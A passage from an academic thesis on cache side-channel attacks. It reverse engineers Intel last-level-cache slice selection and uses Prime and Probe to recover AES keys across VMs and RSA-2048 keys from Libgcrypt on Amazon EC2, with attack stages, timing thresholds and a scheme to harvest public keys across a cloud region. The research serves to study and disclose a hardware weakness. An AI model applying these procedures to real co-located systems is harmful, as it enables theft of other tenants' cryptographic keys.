v0 | p9⊕p14⊕p15⊕p19⊕p21⊕p24⊕p25⊕p26⊕p27⊕p29⊕p32⊕p34
v1 | p7⊕p12⊕p13⊕p17⊕p19⊕p22⊕p23⊕p24⊕p25⊕p27⊕p31⊕p32⊕p33
v2 | p9⊕p11⊕p14⊕p15⊕p16⊕p17⊕p19⊕p23⊕p24⊕p25⊕p28⊕p31⊕p33⊕p34
v3 | p7⊕p10⊕p12⊕p13⊕p15⊕p16⊕p17⊕p19⊕p20⊕p23⊕p24⊕p26⊕p28⊕p30⊕p31⊕p32⊕p33⊕p34
nl | v0·v1·¬(v2·v3)

Therefore, we speculate that the 4 bits selecting the slice look like:

h0(p) = h0(p)
h1(p) = ¬(nl(p))·h′1(p)
h2(p) = ¬(nl(p))·h′2(p)
h3(p) = nl(p)

where h0, h1 and h2 are the hash functions selecting bits 0, 1 and 2 respectively, h3 is the function selecting the 3rd bit and nl is a non-linear function of unknown degree. We recall that the proportion of occurrence of the last two slices is 3/16. To obtain this distribution we need a degree 4 non-linear function in which two inputs are negated, i.e.:

nl = v0 · v1 · ¬(v2 · v3)  (6.4)

where nl is 0 for the 8 linear slices and 1 for the 2 non-linear slices. Observe that nl will be 1 with probability 3/16 and 0 with probability 13/16, matching the distributions seen in our experiments.
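The 3/16 figure can be verified by brute force over the four bits (a quick consistency check, treating v0..v3 as independent uniform bits):

```python
from itertools import product

# nl = v0 · v1 · ¬(v2 · v3): count the inputs for which nl = 1
hits = sum(v0 & v1 & (1 - (v2 & v3))
           for v0, v1, v2, v3 in product((0, 1), repeat=4))
assert hits == 3   # nl = 1 for 3 of the 16 inputs, i.e. probability 3/16
```

Only the v0 = v1 = 1 quadrant can fire (4 of 16 inputs), and the v2 = v3 = 1 case is excluded, leaving 3.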
Consequently, to find v0 and v1 we only have to solve Equation (6.2) for slices 8 and 9 together, requiring an output of 1. To find v2 and v3, we first separate those addresses of the linear slices 0-7 for which v0 and v1 output 1. For those cases, we solve Equation (6.2) for slices 0-7.

The result is summarized in Table 6.3, which shows both the non-linear function vectors v0, v1, v2, v3 and the linear functions h0, h′1, h′2. These results describe the behavior of the slice selection algorithm implemented in the Intel Xeon E5-2670 v2. It can be observed that the bits involved in the set selection (bits 6 to 16 for the LLC) are also involved in the slice selection process, unlike with linear selection algorithms. This means that for different sets, different memory blocks will map to the same slice.

Note that the method applied here can be used to reverse engineer other machines that use different non-linear slice selection algorithms. By looking at the distribution of the memory blocks over all the slices, we can always get the shape of the non-linear part of the slice selection algorithm. The rest of the steps are generic, and can even be applied to linear slice selection algorithms.

Figure 6.8: Histograms of 10,000 access times in the probe stage when all the lines are in the L3 cache and when all except one are in the cache (the remaining one in memory).

6.8 The LLC Prime and Probe Attack Procedure

With the previously discussed challenges solved, we can proceed to apply our LLC Prime and Probe attack. Our LLC Prime and Probe technique takes advantage of the control of the lower k bits of the virtual address that we gain with huge pages, and of the knowledge of the slice selection algorithm.
These are the main steps that our spy process follows to detect accesses to the last level cache:

• Step 1: Allocate huge pages if available: The spy process is based on the control that the attacker gains over the virtual address when using huge pages. Therefore the spy process has to have access to the available huge pages, which requires administrator rights. Recall that this is not a problem in the cloud scenario, where the attacker has administrator privileges in his guest OS. If huge pages are not available, an attacker can start from Step 2 at the cost of a more time-consuming eviction set discovery.

• Step 2: Find eviction sets: Due to the slice selection algorithm, an attacker first has to deduce which of his memory blocks collide in the same set-slice. To do this, he can be aided by the slice selection algorithm knowledge acquired previously in Section 6.7.4, speeding up the attack process. If the slice selection algorithm is not known, an attacker can also create eviction sets "on the fly", again at the cost of a more challenging and complicated process.

• Step 3: Prime the desired set-slice in the last level cache: In this step the attacker creates data that will occupy one of the set-slices in the last level cache. By controlling the virtual address (and, if known, the slice selection algorithm), the attacker knows the set-slice that the created data will occupy in the last level cache. Once sufficiently many blocks have been created to occupy the set and slice, the attacker primes the set-slice and ensures it is filled. Typically the last level caches are inclusive; thus we not only fill the shared last level cache set but also the corresponding sets in the upper level caches.

• Step 4: Victim process runs: After the priming stage, the victim runs the target process. Since one of the set-slices in the last level cache is already filled, if the targeted process uses the monitored set-slice, one of the primed blocks is going to be evicted.
Remember that we are priming the last level cache, so evicted memory blocks will reside in memory. If the monitored set-slice is not used, all the primed blocks will still reside in the cache hierarchy after the victim's process execution.

• Step 5: Probe and measure: Once the victim's process has finished, the spy process probes the primed memory blocks and measures the time to probe them all. If one or more blocks have been evicted by the targeted process, they will be loaded from memory and we will see a higher probe time. However, if all the blocks still reside in the cache, we will see a shorter probe time.

The last step can be made more concrete with the experiment results summarized in Figure 6.8. The experiment was performed in native execution (no VM) on an Intel i5-650, which has a 16-way associative last level cache. It can be seen that when all the blocks reside in the last level cache we obtain very precise probe timings, with an average around 250 cycles and very little variance. However, when one of the blocks is evicted from the last level cache and resides in memory, both the access time and the variance are higher. We conclude that the two types of accesses are clearly distinguishable.

6.8.1 Prime and Probe Applied to AES

In this section we explain how the Prime and Probe spy process can be applied to attack AES. Again, we use the C reference implementation of the OpenSSL 1.0.1f library, which uses 4 different T-tables during the AES execution. Recovering one round key is sufficient for AES-128, as the key scheduling is invertible. We use the last round as our targeted round for convenience. Since the 10th round does not implement the MixColumns operation, the ciphertext directly depends on the T-table position accessed and the last round key. Let Si be the value of the ith byte prior to the last round T-table look-up operation.
Then the ciphertext byte Ci will be:

Ci = Tj[Si] ⊕ K10_i  (6.5)

where Tj is the corresponding T-table applied to the ith byte and K10_i is the ith byte of the last round key. It can be observed that if the ciphertext and the T-table positions are known, we can guess the key by a simple XOR operation. We assume the ciphertext to always be known by the attacker. Therefore the attacker will use the Prime and Probe spy process to guess the T-table position used in the encryption and, consequently, obtain the key. Thus, if the attacker knows which set each of the T-table memory lines occupies, Prime and Probe will detect that the set is not accessed 8% of the time, and once he has obtained enough measurements, the key can be recovered from Equation (6.5).

Locating the Set of the T-Tables: The previous description implicitly assumes that the attacker knows the location, i.e. the sets, that each T-table occupies in the shared cache. A simple approach to gain this knowledge is to prime and probe every set in the cache, and analyze the timing behavior for a few random AES encryptions. The T-table based AES implementation leaves a distinctive fingerprint on the cache, as the T-table size as well as the access frequency (92% per line per execution) are known. Once the T-tables are detected, the attack can be performed on a single line per table. Nevertheless, this locating process can take a significant amount of time when the number of sets in the outermost shared cache is sufficiently high. An alternative, more efficient approach is to take advantage of the shared library page alignment that some OSs like Linux implement. Assuming that the victim is not using huge pages for the encryption process, the shared library is aligned at a 4 KB page boundary. This gives us some information to narrow down the search space, since the lower 12 bits of the virtual address will not be translated.
Thus, we know the offset fi modulo 64 of each T-table memory line, and the T-table location search space is reduced by a factor of 64. Furthermore, we only have to locate one T-table memory line per memory page, since the rest of the table occupies the consecutive sets in the last level cache.

Attack stages: Putting it all together, these are the main stages that we follow to attack AES with Prime and Probe:

• Step 1: Last level cache profile stage: The first stage of the attack is to gain knowledge about the structure of the last level cache, the number of slices, and the lines that fill one of the sets in the last level cache.

• Step 2: T-table set location stage: The attacker has to know which sets in the last level cache the T-tables occupy, since these are the sets that need to be primed to obtain the key.

• Step 3: Measurement stage: The attacker primes the desired set-slices, requests encryptions and probes again to check whether the monitored sets have been used or not.

• Step 4: Key recovery stage: Finally, the attacker uses the measurements taken in Step 3 to derive the last round key used by the AES server.

6.8.2 Experiment Setup and Results for the AES Attack

In this section we describe our experiment setup and the results obtained in native machine, single VM and cross-VM scenarios, specifically with deduplication-free hypervisors where Flush and Reload and Invalidate and Transfer could not succeed.

6.8.2.1 Testbed Setup

The machine used for all our experiments is a dual core Nehalem Intel i5-650 [inta] clocked at 3.2 GHz. This machine works with 64-byte cache lines and has private 8-way associative L1 and L2 caches of sizes 2^15 and 2^18 bytes, respectively. In contrast, the 16-way associative L3 cache is shared among all the cores and has a size of 2^22 bytes, divided into two slices. Consequently, the L3 cache has 2^12 sets in total.
Therefore 6 bits are needed to address the byte within a cache line and 12 more bits to specify the set in the L3 cache. The huge page size is set to 2 MB, which ensures a set field length of 21 bits that are untouched in the virtual to physical address translation stage. All the guest OSs use Ubuntu 12.04, while the VMMs used in our cloud experiments are Xen 4.1, fully virtualized, and VMware ESXI 5.5. Both allow the usage of huge size pages by guest OSs [BDF+03, Xenb, xena]. Neither implements memory deduplication mechanisms: Xen because it lacks such a feature, VMware because we disabled it manually. Recall that, under these settings, Flush and Reload and Invalidate and Transfer would not be able to recover any meaningful information. We will observe that this is not the case for Prime and Probe.

The target process uses the C reference implementation of OpenSSL 1.0.1f, which is the default if the library is configured with the no-asm and no-hw options. We would like to remark that these are not the default OpenSSL installation options in most products. The attack scenario is the same as in Section 4.4, where one process/VM handles encryption requests with a secret key. The attacker's process/VM is co-located with the encryption server, but on a different core. We assume synchronization with the server, i.e., the attacker starts the Prime and Probe spy process and then sends random plaintexts to the encryption server. The communication between the encryption server and the attacker is carried out via socket connections. Upon reception of the ciphertext, the attacker measures the L3 cache usage with the Prime and Probe spy process. All measurements are taken by the attacker's process/VM with the rdtscp instruction, which not only reads the time stamp counter but also ensures that all previous instructions have finished before its execution [rdt].
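The address decomposition just described can be sketched as follows; the bit positions assume the 64-byte-line, 2^12-set L3 of the i5-650 described above:

```python
LINE_BITS, SET_BITS = 6, 12          # 64-byte lines, 2^12 sets (across both slices)

def line_offset(addr: int) -> int:
    """Low 6 bits: byte offset within a 64-byte cache line."""
    return addr & ((1 << LINE_BITS) - 1)

def set_index(addr: int) -> int:
    """Next 12 bits (bits 6..17): which of the 2^12 L3 sets the line maps to."""
    return (addr >> LINE_BITS) & ((1 << SET_BITS) - 1)

# With 2 MB huge pages the low 21 bits survive virtual-to-physical
# translation, and offset + set fields need only 6 + 12 = 18 bits,
# so the set index is computable directly from a virtual address:
assert LINE_BITS + SET_BITS <= 21
assert set_index(0x40) == 1               # second cache line -> set 1
assert set_index((1 << 18) + 0x40) == 1   # bit 18 lies beyond the set field
```

Without huge pages only the low 12 bits are known, which is exactly why the shared library page alignment argument above reduces the search space by 64 rather than eliminating it.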
Figure 6.9: Histograms of 500 access times monitored in the probe stage for a) a set used by a T-table memory line and b) a set not used by a T-table memory line. Measurements are taken in the Xen 4.1 cross-VM scenario.

6.8.2.2 The Cross-Core Cross-VM Attack

We perform the attack in three different scenarios: native machine, single VM, and cross-VM. In the native and single VM scenarios, we assume that huge size pages can be used by any non-root process running in the OS. Recall that in the cross-VM scenario, the attacker has administrator rights in his own OS.

The first step is to recognize the access pattern of the L3 cache in our Intel i5-650. Making use of the knowledge of the slice selection algorithm in Section 6.7.4, we observe that odd blocks (17th bit of the physical address equal to 1) and even blocks (17th bit of the physical address equal to 0) are allocated in different slices. Thus we need 16 odd blocks to fill a set in the odd slice, whereas we need 16 even blocks to fill a specific set in the even slice.

The second step is to recognize the set that each T-table cache line occupies in the L3 cache. For that purpose we monitor each of the possible sets according to the offset obtained from the Linux shared library alignment feature. Recall that if the offset modulo 64, f_0, of one of the T-tables is known, we only need to check the sets that are 64 positions apart, starting from f_0. When random plaintexts are sent, the set holding a T-table cache line is used around 90% of the time, while around 10% of the time the set remains unused.
The difference between a set allocating a T-table cache line and a set not allocating one can be seen graphically in Figure 6.9, where 500 random encryptions were monitored with Prime and Probe for both cases in a cross-VM scenario in Xen 4.1. It can be observed that monitoring an unused set results in more stable timings in the range of 200-300 cycles, whereas monitoring a set used by the T-tables outputs higher time values around 90% of the time, while we still see some lower time values below 300 around 10% of the time. Note that the key used by the AES server is irrelevant in this step, since the sets used by the T-table cache lines are independent of the key.

Figure 6.10: Miss counter values for ciphertext 0 normalized to the maximum value. The key is 0xe1 and we are monitoring the last 8 values of the T-table (since the table starts in the middle of a memory line).

The last step is to run Prime and Probe to recover the AES key used by the AES server. We consider as valid ciphertexts for the key recovery step those whose miss counters are below half the average of the overall timings. This threshold is based on the empirical results shown in Figure 6.10, and is calculated as the overall counter average divided by 2. The figure presents the miss counter value for all possible values of the ciphertext byte C_0, when the last line in the corresponding T-table is monitored. The key in this case is 0xe1 and the measurements are taken in a cross-VM scenario in Xen 4.1. In this case only 8 values take low miss counter values because the T-table finishes in the middle of a cache line. These values are clearly distinguishable from the rest and appear on opposite sides of the empirical threshold.

Results for the three scenarios are presented in Figure 6.11, where it can be observed that the noisier the scenario is, e.g.
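The thresholding step can be simulated in a few lines. The counter magnitudes and the monitored table byte values below are invented for illustration, but the classification rule (overall counter average divided by 2) is the one described above:

```python
import random

def below_threshold_values(miss_counter):
    """Return the ciphertext values whose miss counter falls below the
    empirical threshold of Figure 6.10: overall average divided by 2."""
    thr = sum(miss_counter) / len(miss_counter) / 2
    return {c for c, n in enumerate(miss_counter) if n < thr}

# Simulated counters: 8 ciphertext values map to the monitored (half)
# cache line and rarely miss; the other 248 miss almost every encryption.
# Both the key 0xE1 and the byte range 0xF8..0xFF are illustrative.
key = 0xE1
line_vals = range(0xF8, 0x100)
low = {t ^ key for t in line_vals}
counters = [random.randint(0, 40) if c in low else random.randint(360, 400)
            for c in range(256)]
assert below_threshold_values(counters) == low
```

Each recovered low-counter ciphertext value then yields a key-byte candidate via the XOR of Equation 6.5, and the candidates agree on the correct key byte.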
in the cross-VM scenario, the more monitored encryptions are needed to recover the key. The plot shows the number of correctly guessed key bytes vs. the number of encryptions needed. Recall that the maximum number of correctly guessed key bytes is 16 for AES-128. The attack needs only 150,000 encryptions to recover the full AES key in the native OS scenario. Due to the higher noise in the cloud setting, the single VM scenario recovers the full key with 250,000 encryptions.

Figure 6.11: Number of key bytes correctly recovered vs. number of encryptions needed for the native OS, single VM, and cross-VM scenarios.

The cross-VM scenario was analyzed in two popular hypervisors, Xen and VMware, requiring 650,000 and 500,000 encryptions respectively to recover the 16 key bytes. We believe that Xen requires a higher number of encryptions due to the higher noise caused by the usage of a fully virtualized hypervisor. It is important to remark that the attack is completed in only 9 and 35 seconds, respectively, for the native and single VM scenarios. In the cross-VM scenario, the attack succeeds in recovering the full key in 90 and 150 seconds in VMware and Xen, respectively. Recall that in the cross-VM scenario the external IP communication adds significant latency.

In short, compared to the Flush and Reload attack presented earlier, the Prime and Probe attack needs more encryptions to succeed in recovering the key. This is expected behavior, as the Prime and Probe attack suffers more from noise. Indeed, Flush and Reload needs w accesses from an unrelated process to create a noisy measurement, w being the associativity of the cache.
However, as the Prime and Probe attack fills the whole set, a single access from an unrelated process to the set being primed creates a noisy measurement. Nevertheless, Prime and Probe succeeds in recovering the key in hypervisors where Flush and Reload and Invalidate and Transfer cannot, including commercial clouds, which do not have memory deduplication enabled. We present a full real-world attack using Prime and Probe in the next section.

6.9 Recovering RSA Keys in Amazon EC2

As we said, the Prime and Probe attack does not assume any special requirements other than that attacker and victim are co-resident on the same CPU socket. Thus, there is no reason why it cannot succeed in commercial clouds, like Amazon EC2. Amazon EC2 mostly uses Intel-based servers, for which we know that the LLC is inclusive. More than that, Intel's market share in desktop and server processors was more than 80% at the beginning of 2016 [Alp09], and since Intel does not seem to offer non-inclusive caches in these devices (at least we have not observed any), our attack would work on a large fraction of current computers. In the cloud scenario, of course, co-residency with the target first has to be achieved. We assume co-residency is achieved (in fact, with the methodologies described in [VZRS15, IGES16]), and that the attacker utilizes the same hardware resources as an RSA decryption server.

To prove the viability of the Prime and Probe attack in Amazon EC2 across co-located VMs, we show how it can be utilized to steal RSA cryptographic keys. It is important to remark that the attack is not processor specific, and can be implemented on any processor with inclusive last level caches. The attack targets a sliding window implementation of RSA-2048. Note that attacking such an implementation is far more difficult than the one described in Section 5.4, since the multiplication function by itself does not give us enough information about the key.
In this case, contrary to the case of AES and as explained in Section 2.4.2, we put our focus on the multiplicands, which are dynamically allocated. Thus Flush and Reload, even on deduplication-enabled systems, would not be able to recover such information. We will use Libgcrypt 1.6.2 as our target library, which not only uses a sliding window implementation but also uses CRT and message blinding techniques. The message blinding process is performed as a side channel countermeasure against chosen-ciphertext attacks, in response to studies such as [GST14, GPPT15]. However, note that this does not prevent our attack, as we only focus on the key processing without requiring any particular ciphertext shape. Further, the CRT implementation requires us to recover d_p and d_q separately, but once the knowledge of both is acquired, the full key can be retrieved [HDWH12, Ham13].

The modular exponentiation in Libgcrypt uses the sliding window approach shown in Algorithm 8. In particular, Libgcrypt pre-computes the values c^3, c^5, c^7, ..., c^(2^W − 1) in a table. Then, the key is processed in windows that are required to start and finish with a set bit, and have a maximum length of W, W being the window size. Until a set bit is found, squares are issued normally. When a set bit is found and a window of length l (l ≤ W) is formed, l squares are issued and a multiplication with the appropriate table entry is performed. Clearly, the accesses to the precomputed table leak information about the window being processed, and therefore the key bit values of the windows.
Our attack uses the Prime and Probe side channel technique to recover the positions of the table T that holds the values c^3, c^5, c^7, ..., c^(2^W − 1), where W is the window size.

Algorithm 7 RSA with CRT and Message Blinding
Input: Ciphertext c ∈ Z_N, exponents d, e, modulus N = pq
Output: m
  r ←$ Z_N with gcd(r, N) = 1          // Message blinding
  c* = c · r^e mod N
  d_p = d mod (p − 1)                   // CRT conversion
  d_q = d mod (q − 1)
  m_1 = (c*)^(d_p) mod p                // Modular exponentiation
  m_2 = (c*)^(d_q) mod q
  h = q^(−1) · (m_1 − m_2) mod p        // Undo CRT
  m* = m_2 + h · q
  m = m* · r^(−1) mod N                 // Undo blinding
  return m

For CRT-RSA with 2048 bit keys, W = 5 for both exponentiations d_p, d_q. Observe that, if all the positions are recovered correctly, reconstructing the key is a straightforward step. In order to perform the attack:

•We make use of the fact that the offset of the address of each table entry does not change when a new decryption process is executed. Therefore, we only need to monitor a subsection of all possible sets, yielding a lower number of traces.

•Instead of monitoring both the multiplication and the table entry set (as in [Fan15] for El Gamal), we only monitor a table entry set in one slice. This avoids the step where the attacker has to locate the multiplication set and removes an additional source of noise.

Recall that we do not control the victim's user address space. This means that we do not know the location of each of the table entries, which indeed changes from execution to execution, as the table is dynamically allocated. Therefore we will monitor a set hoping that it will be accessed by the algorithm. However, our analysis shows a special behavior: each time a new decryption process is started, even if the location changes, the offset field does not change from decryption to decryption. Thus, we can directly relate a monitored set offset with a specific entry in the multiplication table.
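Algorithm 7 can be sketched directly in Python and checked against plain RSA decryption; the parameters at the bottom are tiny toy values for illustration only, not secure sizes:

```python
import math
import random

def rsa_crt_blinded_decrypt(c, d, e, p, q):
    """Sketch of Algorithm 7: CRT decryption with message blinding."""
    N = p * q
    while True:                          # blinding factor r coprime to N
        r = random.randrange(2, N)
        if math.gcd(r, N) == 1:
            break
    c_star = (c * pow(r, e, N)) % N      # blind the ciphertext
    dp = d % (p - 1)                     # CRT exponents: the attack's targets
    dq = d % (q - 1)
    m1 = pow(c_star, dp, p)              # two half-size exponentiations
    m2 = pow(c_star, dq, q)
    h = (pow(q, -1, p) * (m1 - m2)) % p  # undo CRT (Garner recombination)
    m_star = m2 + h * q
    return (m_star * pow(r, -1, N)) % N  # undo blinding

# Toy parameters (illustration only):
p, q, e = 61, 53, 17
N = p * q
d = pow(e, -1, (p - 1) * (q - 1))
m = 42
assert rsa_crt_blinded_decrypt(pow(m, e, N), d, e, p, q) == m
```

Note that blinding randomizes the data being exponentiated but not the exponents d_p and d_q themselves, which is why the table-access pattern targeted by the attack is unaffected.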
The knowledge of the processor on which the attack is carried out gives an estimation of the probability that the set/slice we monitor collides with the set/slice the victim is using. For each table entry, we fix a specific set/slice where not much noise is observed. In the Intel Xeon E5-2670 v2 processors utilized by Amazon EC2, the LLC is divided into 2048 sets and 10 slices.

Algorithm 8 RSA Sliding-Window Exponentiation
Input: Ciphertext c ∈ Z_N, exponent d, window size w
Output: c^d mod N
  // Table precomputation step
  T[0] = c^3 mod N
  v = c^2 mod N
  for i from 1 to 2^(w−1) − 1 do
      T[i] = T[i − 1] · v mod N
  end
  // Exponentiation step
  b = 1, j = len(d)
  while j > 0 do
      if e_j == 0 then
          b = b^2 mod N
          j = j − 1
      else
          Find e_j e_(j−1) ... e_l with j − l + 1 ≤ w and e_l = 1
          b = b^(2^(j−l+1)) mod N
          u = (e_j e_(j−1) ... e_l)_2
          if u == 1 then
              b = b · c mod N
          else
              b = b · T[(u − 3)/2] mod N
          end
          j = l − 1
      end
  end
  return b

Therefore, knowing the lowest 12 bits of the table locations, we will need to monitor one set/slice that solves s mod 64 = o, where s is the set number and o is the offset of a table location. This increases the probability of probing the correct set from 1/(2048 · 10) = 1/20480 to 1/((2048 · 10)/64) = 1/320, reducing the number of traces needed to recover the key by a factor of 64. Thus our spy process will monitor accesses to one of the 320 set/slices related to a table entry, hoping that the RSA decryption accesses it when we run repeated decryptions.

Recall that we reverse engineered the slice selection algorithm for Intel Xeon E5-2670 v2 processors in Section 6.7.7. Thanks to the knowledge of the non-linear slice selection algorithm, we can easily change our monitored set/slice if we observe a high amount of noise in one particular set/slice. Since we also have to monitor a different set per table entry, it also helps us to change our eviction set accordingly.
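Algorithm 8 can be sketched in Python and checked against the built-in modular exponentiation. This is a textbook reconstruction of sliding-window exponentiation with a table of odd powers, not Libgcrypt's actual code:

```python
def sliding_window_pow(c, d, N, w=5):
    """Left-to-right sliding-window exponentiation (sketch of Algorithm 8).

    Precomputes T[i] = c^(3 + 2i) mod N, i.e. the odd powers
    c^3, c^5, ..., c^(2^w - 1), then scans the exponent bits MSB-first.
    """
    v = pow(c, 2, N)
    T = [pow(c, 3, N)]                   # 2^(w-1) - 1 odd powers in total
    for _ in range(2 ** (w - 1) - 2):
        T.append(T[-1] * v % N)

    bits = bin(d)[2:]
    b, j, n = 1, 0, len(bits)
    while j < n:
        if bits[j] == '0':
            b = b * b % N                # plain square on a zero bit
            j += 1
        else:
            l = min(w, n - j)            # longest window ending in a set bit
            while bits[j + l - 1] == '0':
                l -= 1
            for _ in range(l):           # one square per window bit
                b = b * b % N
            u = int(bits[j:j + l], 2)    # odd window value, 1 .. 2^w - 1
            b = b * (c if u == 1 else T[(u - 3) // 2]) % N
            j += l
    return b

assert sliding_window_pow(7, 65537, 101 * 103) == pow(7, 65537, 101 * 103)
```

The leakage exploited by the attack is visible in the last line of the loop: the table index (u − 3)/2 depends directly on the window bits of the secret exponent.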
Thanks to the knowledge of the non-linear slice selection algorithm, we select a range of sets/slices s_1, s_2, ..., s_n for which the memory blocks that create the eviction sets do not change, and that allow us to profile all the precomputed table entries. The threshold is different for each of the sets, since the time to access different slices usually varies. Thus, the threshold for each of the sets has to be calculated before the monitoring phase.

In order to improve the applicability of the attack, the LLC can be monitored to detect whether there are RSA decryptions in the co-located VMs, as proposed in [IGES16]. Once it is established that RSA decryptions are taking place, the attack can be performed. In order to obtain high quality timing leakage, we synchronize the spy process and the RSA decryption by initiating communication between the victim and attacker, e.g. by sending a TLS request. Note that we are looking for a particular pattern observed for the RSA table entry multiplications, and therefore processes scheduled before the RSA decryption will not be counted as valid traces. In short, the attacker communicates with the victim before the decryption. After this initial communication, the victim starts the decryption while the attacker starts monitoring the cache usage. In this way, we monitor 4,000 RSA decryptions with the same key and same ciphertext for each of the 16 different sets related to the 16 table entries.

We investigate a hypothetical case where a system with dual CPU sockets is used. In such a system, depending on the hypervisor CPU management, two scenarios can play out: processes moving between sockets, and processes assigned to specific CPUs. In the former scenario, we can observe the necessary number of decryption samples simply by waiting over a longer period of time.
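The per-set calibration can be sketched as below. The text only states that each set needs its own threshold because slice access times differ; taking the midpoint between the mean hit time and the mean miss time is an assumed heuristic, not the thesis's stated method:

```python
def calibrate_threshold(hit_samples, miss_samples):
    """Per-set probe-time threshold: midpoint between the empirical mean
    access time with the line cached (hit) and evicted (miss).
    The midpoint rule is an assumption for illustration."""
    hit_mean = sum(hit_samples) / len(hit_samples)
    miss_mean = sum(miss_samples) / len(miss_samples)
    return (hit_mean + miss_mean) / 2

# Hypothetical calibration samples for one monitored set/slice (cycles):
thr = calibrate_threshold([70, 80, 75], [250, 300, 280])
assert 80 < thr < 250   # the threshold separates the two populations
```

In the real attack the calibration samples would be gathered per set/slice before the monitoring phase, exactly because a single global threshold would misclassify accesses on the slower slices.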
In this scenario, the attacker would collect traces and only use the information obtained during the times the attacker and the victim share a socket, discarding the rest as missed traces. In the latter scenario, once the attacker achieves co-location, as we have in Amazon EC2, the attacker will always run on the same CPU as the target, hence the attack will succeed in a shorter span of time.

Among the 4,000 observations for each monitored set, only a small portion contains information about the multiplication operations with the corresponding table entry. These are recognized because their exponentiation trace pattern differs from that of unrelated sets. In order to identify where each exponentiation occurs, we inspected 100 traces and created the timeline shown in Figure 6.12(b). It can be observed that the first exponentiation starts after 37% of the overall decryption time. Note that among all the traces recovered, only those that have more than 20 and fewer than 100 peaks are considered; the remaining ones are discarded as noise. Figure 6.12 shows measurements where no correct pattern was detected (Fig. 6.12(a)), and where a correct pattern was measured (Fig. 6.12(b)). In general, after the elimination step, there are 8-12 correct traces left per set.

We observe that the data obtained from each of these sets corresponds to 2 consecutive table positions. This is a direct result of CPU cache prefetching: when a cache line that holds a table position is loaded into the cache, the neighboring table position is also loaded due to the cache locality principle.

For each graph to be processed, we first need to align the creation of the look-up table with the traces. Identifying the table creation step is trivial since each table position is used twice, taking two or more time slots.
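The peak-count elimination step described above can be sketched as follows; the 300-cycle peak threshold is an assumed value chosen to be in line with the probe timings reported earlier, and the trace contents are synthetic:

```python
def count_peaks(trace, threshold=300):
    """A probed time above `threshold` cycles counts as a peak
    (i.e. a likely access to the monitored table-entry line)."""
    return sum(1 for t in trace if t > threshold)

def keep_valid(traces, threshold=300):
    """Keep only traces with more than 20 and fewer than 100 peaks,
    as in the elimination step described above."""
    return [tr for tr in traces if 20 < count_peaks(tr, threshold) < 100]

# Synthetic traces (cycle values are invented):
good = [500] * 50 + [200] * 950    # 50 peaks  -> plausible exponentiation
noisy = [500] * 400 + [200] * 600  # 400 peaks -> noise, discarded
flat = [200] * 1000                # 0 peaks   -> unrelated set, discarded
assert keep_valid([good, noisy, flat]) == [good]
```

After this filter, the surviving 8-12 traces per set feed the alignment and noise reduction stage.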
Figure 6.12: Different sets of data where we find a) a trace that does not contain information and b) a trace that contains information about the key.

Figure 6.13(a) shows the table access position indexes aligned with the table creation. In the figure, the top graph shows the true table accesses while the rest of the graphs show the measured data. It can be observed that the measured traces suffer from misalignment due to noise from various sources, e.g. RSA or co-located neighbors. In consequence, we apply alignment and noise reduction techniques typically utilized in DPA attacks [KJJ99] to obtain a clean cache trace. The result after such an alignment process can be observed in Figure 6.14, which compares the real indices of a particular table entry with those retrieved from our analysis.

Despite the good results of these noise reduction techniques, we still do not end up with a perfect trace. The overall results are presented in Table 6.4, where 0.65% of the peaks are misdetected. Thus, the key recovery algorithm described in [Ham13] is applied to establish relationships between the noisy d_p and d_q and recover a full clean RSA key. In order to apply such an algorithm we need information about the public key. We distinguish two different scenarios in which the attacker is able to utilize public keys for the error correction algorithm.
In both, we assume the attacker has already retrieved the leakage from the RSA decryption key of a (potentially known) server:

•Targeted Co-location: The Public Key is Known. In this case we assume that the attacker implemented a targeted co-location against a known server, and that she has enough information about the public key parameters of the target.

•Bulk Key Recovery: The Public Key is Unknown. In this scenario, the attacker can build up a database of public keys by mapping the entire IP range of the targeted Amazon EC2 region and retrieving all the public keys of hosts that have the TLS port open. The attacker then runs the above described algorithm for each of the recovered private keys against the entire public key database. Having the list of 'neighboring' IPs with an open TLS port also allows the attacker to initiate TLS handshakes to make the servers use their private keys with high frequency.

Figure 6.13: 10 traces from the same set where a) they are divided into blocks for a correlation alignment process and b) they have been aligned and the peaks can be extracted.

Figure 6.14: Comparison of the final obtained peaks with the correct peaks, with adjusted timeslot resolution.

Table 6.4: Successfully recovered peaks on average in an exponentiation
  Average number of traces/set          4000
  Average number of correct graphs/set    10
  Wrongly detected peaks                7.19%
  Misdetected peaks                     0.65%
  Correctly detected peaks             92.15%

In the first scenario, the attacker has information about the public key and thus he can directly apply the error correction algorithm that we will describe. In the second scenario, the attacker has a database of public keys, and he does not know which public key the private key leakage belongs to.
In this case, the attacker runs the error correction algorithm with each of the public keys in the database until he finds a successful correlation.

We proceed next to explain the algorithm used to recover the noise-free decryption key. The leakage analysis described above recovers information on the CRT version of the secret exponent d, namely d_p = d mod (p − 1) and d_q = d mod (q − 1). A noise-free version of either one can be used to trivially recover the factorization of N = pq, since gcd(m − m^(e·d_p), N) = p for virtually any m [CS04]. Thus, our goal is to retrieve a noise-free d_p or d_q from the noisy d*_p and d*_q. This is not directly our case: even with alignment and noise filtering techniques we still had misdetected and wrongly detected peaks. In such cases, we can exploit the relation of d_p and d_q to the known public key if the public exponent e is small [Ham13]. This is indeed our case, as almost all RSA implementations currently use e = 2^16 + 1 due to the heavy performance boost over a random, full size e. For the CRT exponents we calculated d_p and d_q as d_p = d mod (p − 1) and d_q = d mod (q − 1). Multiplying both sides by e we obtain

e·d_p ≡ 1 mod (p − 1)    (6.6)
e·d_q ≡ 1 mod (q − 1)    (6.7)

since d·e mod ((p − 1)·(q − 1)) = 1. This means that there exist integers k_p and k_q such that e·d_p = k_p(p − 1) + 1 for some 1 ≤ k_p